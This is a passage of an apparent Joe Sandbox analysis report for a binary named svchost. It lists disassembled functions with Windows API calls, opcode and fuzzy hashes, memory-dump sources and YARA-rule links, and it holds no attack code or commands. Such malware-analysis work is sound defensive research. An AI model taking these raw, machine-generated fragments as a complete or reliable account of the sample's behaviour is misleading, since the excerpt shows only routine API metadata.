                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9c3e59d7111fbfd60fa31e0e7ab7503243b528996f8bbda671db8ea8675e6c52
                                                            • Instruction ID: b92b4b10885da46b1e8dfed69e8ec6b6a894b21c4b8a50d6173d8bfaa8f7a404
                                                            • Opcode Fuzzy Hash: 9c3e59d7111fbfd60fa31e0e7ab7503243b528996f8bbda671db8ea8675e6c52
                                                            • Instruction Fuzzy Hash: 63A011F22A800EBC3008A200AE02C3B020CF0C0B20330882EF822C0280A88008000833
                                                            Function 0084E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 61034cdf9d4fb17fd5bc8d959680bb2cd4b457ed0ca6121de79c07e79c56aefc
                                                            • Instruction ID: b92b4b10885da46b1e8dfed69e8ec6b6a894b21c4b8a50d6173d8bfaa8f7a404
                                                            • Opcode Fuzzy Hash: 61034cdf9d4fb17fd5bc8d959680bb2cd4b457ed0ca6121de79c07e79c56aefc
                                                            • Instruction Fuzzy Hash: 63A011F22A800EBC3008A200AE02C3B020CF0C0B20330882EF822C0280A88008000833
                                                            Function 0084E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a289c3d8197aae903abc27f709292583398d77874bb93d8cc444d240dc5c0054
                                                            • Instruction ID: b92b4b10885da46b1e8dfed69e8ec6b6a894b21c4b8a50d6173d8bfaa8f7a404
                                                            • Opcode Fuzzy Hash: a289c3d8197aae903abc27f709292583398d77874bb93d8cc444d240dc5c0054
                                                            • Instruction Fuzzy Hash: 63A011F22A800EBC3008A200AE02C3B020CF0C0B20330882EF822C0280A88008000833
                                                            Function 0084E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E580
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 943daba0d88584d1d730b422957299fbd95d227320542824fc54602ff8491474
                                                            • Instruction ID: 49c1a9886849f05b6f5ee5815398b34c8733c477ff90c635af98f47d9dde8737
                                                            • Opcode Fuzzy Hash: 943daba0d88584d1d730b422957299fbd95d227320542824fc54602ff8491474
                                                            • Instruction Fuzzy Hash: 75A011C22AA00EBC300822A2AC02C3B020CF0C0B283328A2EF822C8080B88008000832
                                                            Function 0084E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E580
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a3c3279b0ad929ed8701d673dbbab5be3969a9918aaf814005e0713197c9894c
                                                            • Instruction ID: 49c1a9886849f05b6f5ee5815398b34c8733c477ff90c635af98f47d9dde8737
                                                            • Opcode Fuzzy Hash: a3c3279b0ad929ed8701d673dbbab5be3969a9918aaf814005e0713197c9894c
                                                            • Instruction Fuzzy Hash: 75A011C22AA00EBC300822A2AC02C3B020CF0C0B283328A2EF822C8080B88008000832
                                                            Function 0084E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a069fcc1d1901cda5f15bbf55283ef01ed49b09bb7a38408d2330193d73058df
                                                            • Instruction ID: 9b65f05439e2b89f98e900b85efad25199d4bfa4f3599e855163d97914f41527
                                                            • Opcode Fuzzy Hash: a069fcc1d1901cda5f15bbf55283ef01ed49b09bb7a38408d2330193d73058df
                                                            • Instruction Fuzzy Hash: 79A011C2AA800EBC3808220AAC02C3B820CF8C2F28332882EF823C0080A8800C000832
                                                            Function 0084E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9bc2b376a085bd481e8fb99e3cb3e2403279847747658cab80fb76d0af40457c
                                                            • Instruction ID: 9b65f05439e2b89f98e900b85efad25199d4bfa4f3599e855163d97914f41527
                                                            • Opcode Fuzzy Hash: 9bc2b376a085bd481e8fb99e3cb3e2403279847747658cab80fb76d0af40457c
                                                            • Instruction Fuzzy Hash: 79A011C2AA800EBC3808220AAC02C3B820CF8C2F28332882EF823C0080A8800C000832
                                                            Function 0084E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e3cecb83e175d27ad2bc9faf7fcd77bf918a088904ab6fdd9f50639cf193ec54
                                                            • Instruction ID: 9b65f05439e2b89f98e900b85efad25199d4bfa4f3599e855163d97914f41527
                                                            • Opcode Fuzzy Hash: e3cecb83e175d27ad2bc9faf7fcd77bf918a088904ab6fdd9f50639cf193ec54
                                                            • Instruction Fuzzy Hash: 79A011C2AA800EBC3808220AAC02C3B820CF8C2F28332882EF823C0080A8800C000832
                                                            Function 0084E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0ca279345eb0f2544403a33ce81a7449eac0e51b18a20c1d49c57a26a78c4f55
                                                            • Instruction ID: 9b65f05439e2b89f98e900b85efad25199d4bfa4f3599e855163d97914f41527
                                                            • Opcode Fuzzy Hash: 0ca279345eb0f2544403a33ce81a7449eac0e51b18a20c1d49c57a26a78c4f55
                                                            • Instruction Fuzzy Hash: 79A011C2AA800EBC3808220AAC02C3B820CF8C2F28332882EF823C0080A8800C000832
                                                            Function 0084E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E580
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 84a9e2b327ebcfce4bcaa4c9432815c1c683ed4d101f0c4ff43fe2b28043714b
                                                            • Instruction ID: f0e8517d97f41a4261e15e6800968a8a98169e403f8483ec6dc30b4aac76708f
                                                            • Opcode Fuzzy Hash: 84a9e2b327ebcfce4bcaa4c9432815c1c683ed4d101f0c4ff43fe2b28043714b
                                                            • Instruction Fuzzy Hash: 31A011C22AA00C3C300822A2AC02C3B020CF0E0B2A332822EF822C8080B88008000832
                                                            Function 00839F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,0083903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00839F0C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            • Opcode ID: 862dc9ae8f9bf4126cd2852867814ddfd4c2045781b601a343c9fc93f7c83f40
                                                            • Instruction ID: c5b28edcaec3ba7c4b372110cff37c3d4b95dbfc4fd409fea81b332aba6af3a8
                                                            • Opcode Fuzzy Hash: 862dc9ae8f9bf4126cd2852867814ddfd4c2045781b601a343c9fc93f7c83f40
                                                            • Instruction Fuzzy Hash: 53A01230044409478D011730CA0400C3710F7107C430111949006CA061C712440B8601
                                                            Function 0084AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,0084AE72,C:\Users\user\Desktop,00000000,0087946A,00000006), ref: 0084AC08
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: b40160c2743cb4c49d93de3126cf8cbd5f8bf5a17706182cbebbc3f2d4efed3e
                                                            • Instruction ID: 54401dc15cc5cf65439bd5b15ae6f70e67ae274182de7320dcaa093d3f621457
                                                            • Opcode Fuzzy Hash: b40160c2743cb4c49d93de3126cf8cbd5f8bf5a17706182cbebbc3f2d4efed3e
                                                            • Instruction Fuzzy Hash: 15A011302002008BA2000B328F0AA0EBAAABFA2B00F02C028B00080030CB30C820AA00
                                                            Function 00839620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,008395D6,?,?,?,?,?,00862641,000000FF), ref: 0083963B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 6365aee1e37362806f4e73af57f3104f75ba453773632f2fecc00940e486ae76
                                                            • Instruction ID: fe43cdaaa75db5c6812164e7ab72a26e0e4d98b9d3a0999e318be1b46743714b
                                                            • Opcode Fuzzy Hash: 6365aee1e37362806f4e73af57f3104f75ba453773632f2fecc00940e486ae76
                                                            • Instruction Fuzzy Hash: A5F08070482B159FDB314A64C45A752B7E8FB62331F045B1DD0E7C29E0E7E5598D8A80

                                                            Non-executed Functions

                                                            Function 0084C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0084C2B1
                                                            • EndDialog.USER32(?,00000006), ref: 0084C2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 0084C2E0
                                                            • SetFocus.USER32(00000000), ref: 0084C2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 0084C321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0084C358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0084C36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0084C38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0084C39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0084C3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0084C3D4
                                                            • _swprintf.LIBCMT ref: 0084C404
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0084C417
                                                            • FindClose.KERNEL32(00000000), ref: 0084C41E
                                                            • _swprintf.LIBCMT ref: 0084C477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 0084C48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0084C4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0084C4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0084C4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0084C4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0084C509
                                                            • _swprintf.LIBCMT ref: 0084C535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0084C548
                                                            • _swprintf.LIBCMT ref: 0084C59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 0084C5AF
                                                              • Part of subcall function 0084AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0084AF35
                                                              • Part of subcall function 0084AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0086E72C,?,?), ref: 0084AF84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                            • API String ID: 797121971-1840816070
                                                            • Opcode ID: 2623238110bc09475cbfbe0b24d43adcd8677d2a6f697be52e694f6e12ef698c
                                                            • Instruction ID: b2dcd0e8bf6197052ee8306d3e0b2c74d73e394f8097b00acbcb9fc9adc950b7
                                                            • Opcode Fuzzy Hash: 2623238110bc09475cbfbe0b24d43adcd8677d2a6f697be52e694f6e12ef698c
                                                            • Instruction Fuzzy Hash: 28918572248348BBD261DBA4DC49FFB77ACFB8A704F044819F749D6091D7B5AA048B63
                                                            Function 00836FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00836FAA
                                                            • _wcslen.LIBCMT ref: 00837013
                                                            • _wcslen.LIBCMT ref: 00837084
                                                              • Part of subcall function 00837A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00837AAB
                                                              • Part of subcall function 00837A9C: GetLastError.KERNEL32 ref: 00837AF1
                                                              • Part of subcall function 00837A9C: CloseHandle.KERNEL32(?), ref: 00837B00
                                                              • Part of subcall function 0083A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0083977F,?,?,008395CF,?,?,?,?,?,00862641,000000FF), ref: 0083A1F1
                                                              • Part of subcall function 0083A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0083977F,?,?,008395CF,?,?,?,?,?,00862641), ref: 0083A21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00837139
                                                            • CloseHandle.KERNEL32(00000000), ref: 00837155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00837298
                                                              • Part of subcall function 00839DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008373BC,?,?,?,00000000), ref: 00839DBC
                                                              • Part of subcall function 00839DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00839E70
                                                              • Part of subcall function 00839620: CloseHandle.KERNELBASE(000000FF,?,?,008395D6,?,?,?,?,?,00862641,000000FF), ref: 0083963B
